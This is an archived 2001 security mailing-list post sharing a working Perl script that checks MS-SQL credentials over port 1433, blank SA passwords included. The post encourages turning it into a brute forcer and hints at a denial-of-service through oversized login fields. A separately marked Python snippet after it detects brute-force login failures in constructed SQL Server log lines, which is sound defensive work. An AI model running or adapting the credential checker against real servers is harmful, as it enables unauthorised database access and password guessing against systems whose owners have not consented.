-------- Original Message --------
Subject: PERL based MS-SQL username/password checker
Date: Fri, 9 Nov 2001 01:37:18 +0000 (GMT)
From: RT <roelof@sensepost.com>
To: <pen-test@securityfocus.com>, <vuln-dev@securityfocus.com>
CC: <alan@packetstormsecurity.org>, <gov-boi@hack.co.za>

Ppl,

Always wanted a PERL based script that could test for usernames and passwords
on MS-SQL (1433)? Test for blank SA passwords etc..? Let it roam inside a
private net?  Open source..modify and have fun...turn it into a brute forcer -
whatever...

Enjoy.
Roelof.

PS: found a way to DOS the service as well. Mail was sent to M$. Let's see what
they come up with. Fiddle with the space allocated to the username and
password... Eeye might even come up with a sweet buffer overflow..who knows??

------------------------------------------------------
Roelof W Temmingh               SensePost IT security
roelof@sensepost.com            +27 83 448 6996
http://www.sensepost.com        http://www.hackrack.com

#!/usr/bin/perl
##
## SQL username/password checker
## Parameters: senseql <IP> <username> <password>
##
## Eg. to check for blank SA:
## senseql 10.0.0.1 sa ""
##
## Roelof Temmingh / Haroon Meer
## roelof@sensepost.com / haroon@senspost.com
## SensePost IT Security
## http://www.sensepost.com
## http://www.hackrack.com
## 2001/11/09
##
## Only tested with version 7.0
##
## You need 1433 open...duh!
##

use warnings;
use IO::Socket;   # also exports the Socket constants, so MSG_PEEK below resolves
$|=1;

if ($#ARGV<2) {die "Usage: senseql IP username password\n";}
$port=1433; $host=$ARGV[0]; $username=$ARGV[1]; $pass=$ARGV[2];
# Username and password travel as fixed 30-byte fields (NUL-padded, anything
# beyond 30 bytes is cut off), each followed by a one-byte length field.
$unh=pack("a30",$username);$psh=pack("a30",$pass);
$numu=pack("c",length($username)); $nump=pack("c",length($pass));
# Fixed parts of a captured login packet, as hex strings:
$FRONT="020002000000020000000000000000000000000000000000000000000000000000000000000000";
$REST="30303030303061300000000000000000000000000000000000201881b82c080301060a090101000000000000000000737175656c646120312e30000000000000000000000000000000000000000b0000000000000000000000000000000000000000000000000000000000000000";
$REST2="0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040200004d5344424c49420000000706000000000d11000000000000000000000000000000000000000000000000";
$hfront=pack("H*",$FRONT);$hrest=pack("H*",$REST);$hrest2=pack("H*",$REST2);
# Login packet: captured header, username + length, password + length, fixed
# middle section, password length + password again, fixed tail.
$FULL=$hfront.$unh.$numu.$psh.$nump.$hrest.$nump.$psh.$hrest2;
# The hex string assigned to $SENDY2 next is a second captured packet that is
# sent straight after the login packet.
$SENDY2="0201004700000200000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030303000000003000000";
$SENDY2 = pack("H*",$SENDY2);
print "$host:$username:$pass:";
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$host,PeerPort => $port)
 || die "No SQL here man... ($!)\n";
print $remote $FULL; print $remote $SENDY2;
# Peek at the first 100 bytes of the reply without consuming them. A successful
# login is recognised by the "Changed database context to 'master'" message the
# server sends back; anything else (login failure, no reply) counts as a miss.
$back = "";
recv($remote,$back,100,MSG_PEEK);
if ($back =~ /context to 'master'/) {print "Yep - go for it\n"}
else {print "No dude..\n";}
close ($remote);
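As an added example from the defender's side (not part of Roelof's post or the SensePost script): the checker above tries one credential per connection and the mail suggests turning it into a brute forcer, so this Python snippet flags exactly that pattern, many failed logins for one account from one client inside a short window, in SQL Server ERRORLOG-style lines. The log lines are constructed; their exact wording and the `[CLIENT: ip]` suffix are assumptions about the log format, so adjust the regex to what your server writes.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sample lines (not real log data) in the style of the SQL Server
# ERRORLOG; the exact wording and the [CLIENT: ip] suffix are assumptions.
SAMPLE_LOG = """\
2001-11-09 01:37:18.10 Logon       Error: 18456, Severity: 14, State: 8.
2001-11-09 01:37:18.10 Logon       Login failed for user 'sa'. [CLIENT: 10.0.0.5]
2001-11-09 01:37:18.35 Logon       Login failed for user 'sa'. [CLIENT: 10.0.0.5]
2001-11-09 01:37:18.61 Logon       Login failed for user 'sa'. [CLIENT: 10.0.0.5]
2001-11-09 01:37:18.90 Logon       Login failed for user 'sa'. [CLIENT: 10.0.0.5]
2001-11-09 01:37:19.12 Logon       Login failed for user 'sa'. [CLIENT: 10.0.0.5]
2001-11-09 01:37:19.40 Logon       Login failed for user 'sa'. [CLIENT: 10.0.0.5]
2001-11-09 01:40:02.00 Logon       Login failed for user 'webapp'. [CLIENT: 10.0.0.9]
2001-11-09 01:41:00.00 spid51      Starting up database 'master'.
"""
FAILED_LOGIN = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]"
)

def parse_failed_logins(text):
    """Return (timestamp, login, client_ip) for every failed-login line."""
    events = []
    for line in text.splitlines():
        m = FAILED_LOGIN.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m.group("user"), m.group("ip")))
    return events

def find_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Map (client_ip, login) -> peak failures for sources that produced at
    least `threshold` failures against one login inside a sliding window."""
    by_key = defaultdict(list)
    for ts, user, ip in events:
        by_key[(ip, user)].append(ts)
    flagged = {}
    for key, stamps in by_key.items():
        stamps.sort()
        start, peak = 0, 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] >= window:  # drop stamps that fell out
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[key] = peak
    return flagged
```

Calling `find_bruteforce(parse_failed_logins(SAMPLE_LOG))` on the constructed lines returns `{('10.0.0.5', 'sa'): 6}`; the single `webapp` failure stays below the threshold.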